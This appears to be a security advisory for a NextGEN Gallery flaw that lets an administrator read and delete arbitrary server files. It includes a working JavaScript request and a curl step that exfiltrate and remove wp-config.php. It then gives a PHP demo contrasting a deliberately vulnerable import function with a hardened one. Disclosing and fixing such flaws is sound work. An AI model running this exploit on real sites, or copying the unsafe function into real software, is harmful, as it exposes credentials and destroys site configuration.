WPVDB-ID: 5C8473F4-4B52-430B-9140-B81B0A0901DA

NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete

2023-09-25 00:00:00
Linwz from DEVCORE
wpscan.com
5
Tags: nextgen gallery, arbitrary file read, arbitrary file delete, input validation, server access

EPSS: 0.001 (percentile 24.2%)

Description: NextGEN Gallery before 3.39 is vulnerable to arbitrary file read and delete because the gallery_edit task does not validate the path supplied for each image_list entry. A user with admin-level credentials (the q and z parameters of the photocrati_ajax endpoint) can point that path at any file the web server process can read; the plugin moves the file into the web-accessible gallery directory under an attacker-chosen filename, so its contents can be fetched over HTTP and the original is removed from its location. Fixed in 3.39.

PoC

1. Create a gallery called "My Gallery" and note its ID.

2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly (the path value is reproduced as given in the advisory):

```javascript
await (await fetch("/index.php", {
  "credentials": "include",
  "headers": { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" },
  "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"name":"x","type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"name":"x","image_list":[{"path":"…/wp-config.php","filename":"xxxxxxx.jpg"}]}}]&extra_data={}',
  "method": "POST",
  "mode": "cors"
})).text();
```

3. Download the file contents with the following curl command:

```shell
curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg
```

4. Note that the original wp-config.php has been deleted: the task moved the file into the gallery directory rather than copying it, which is why a single request both discloses and removes it.
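The following is an added example, not NextGEN Gallery's own code, contrasting the trusting pattern the advisory describes with a hardened version of the same import step. Function names (`import_image_unsafe`, `import_image_safe`, `path_is_inside`), the temporary directory layout and the sample files are all hypothetical, constructed so the script runs stand-alone. The hardened version resolves both source and destination with `realpath()` and refuses anything outside the uploads tree, strips directory components from the target filename, and allow-lists image extensions.

```php
<?php
// Added example (not NextGEN Gallery's code). Function names are hypothetical.

// Vulnerable pattern: the "path" of an image_list entry is trusted as-is and the
// file is moved into the web-accessible gallery directory. Any readable file on
// the server can be fetched over HTTP afterwards, and the original is gone.
function import_image_unsafe(string $gallery_dir, array $entry): bool
{
    $src = $entry['path'];                                  // attacker-controlled
    $dst = rtrim($gallery_dir, '/') . '/' . $entry['filename'];
    return rename($src, $dst);                              // no validation at all
}

// Returns true only if $path resolves to a location inside $base. realpath()
// collapses ".." and follows symlinks, so a symlink placed inside the uploads
// tree that points at wp-config.php is rejected too.
function path_is_inside(string $path, string $base): bool
{
    $real_base = realpath($base);
    $real_path = realpath($path);
    if ($real_base === false || $real_path === false) {
        return false;                                       // nonexistent => reject
    }
    $real_base = rtrim($real_base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real_path, $real_base, strlen($real_base)) === 0;
}

// Hardened pattern: source must be a regular file under the uploads tree, the
// gallery directory must itself be under the uploads tree, and the destination
// name is reduced to a bare file name with an allow-listed image extension.
function import_image_safe(string $uploads_dir, string $gallery_dir, array $entry): bool
{
    $src      = $entry['path'];
    $filename = basename($entry['filename']);               // drop any "../" or "/"
    if (!preg_match('/\.(jpe?g|png|gif|webp)$/i', $filename)) {
        return false;                                       // not an image name
    }
    if (!path_is_inside($src, $uploads_dir) || !is_file($src)) {
        return false;                                       // outside uploads, or not a file
    }
    if (!path_is_inside($gallery_dir, $uploads_dir)) {
        return false;                                       // gallery dir itself escaped
    }
    $dst = rtrim($gallery_dir, '/') . '/' . $filename;
    return rename($src, $dst);
}

// Constructed demonstration layout: a fake site root with an uploads tree,
// a gallery under it, a legitimate photo, and a wp-config.php outside uploads.
$root = sys_get_temp_dir() . '/ngg-demo-' . getmypid();
mkdir("$root/uploads/gallery/my-gallery", 0700, true);
file_put_contents("$root/wp-config.php", "<?php define('DB_PASSWORD', 'secret');");
file_put_contents("$root/uploads/photo.jpg", 'jpeg-bytes');

$gallery = "$root/uploads/gallery/my-gallery";
$attack  = ['path' => "$root/wp-config.php", 'filename' => 'xxxxxxx.jpg'];  // advisory's shape
$legit   = ['path' => "$root/uploads/photo.jpg", 'filename' => 'photo.jpg'];

// Hardened import: the attacker entry points outside the uploads tree.
var_dump(import_image_safe("$root/uploads", $gallery, $attack));
var_dump(file_exists("$root/wp-config.php"));               // still in place?
// Hardened import: a genuine upload is still accepted.
var_dump(import_image_safe("$root/uploads", $gallery, $legit));
// Unsafe import: the config file lands in the gallery directory and is gone from the root.
var_dump(import_image_unsafe($gallery, $attack));
var_dump(file_exists("$root/wp-config.php"));
var_dump(file_exists("$gallery/xxxxxxx.jpg"));
```

Run it with `php example.php`; the three `var_dump` calls for the hardened import show the attacker entry refused with wp-config.php untouched and the legitimate photo accepted, while the unsafe import reproduces the advisory's effect: the config file now sits under the gallery directory and no longer exists at its original path. The containment check deliberately rejects nonexistent sources (`realpath()` returns false) rather than trying to normalise the string by hand, since string-based `..` stripping is exactly the kind of check that symlinks and encoding tricks get past.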

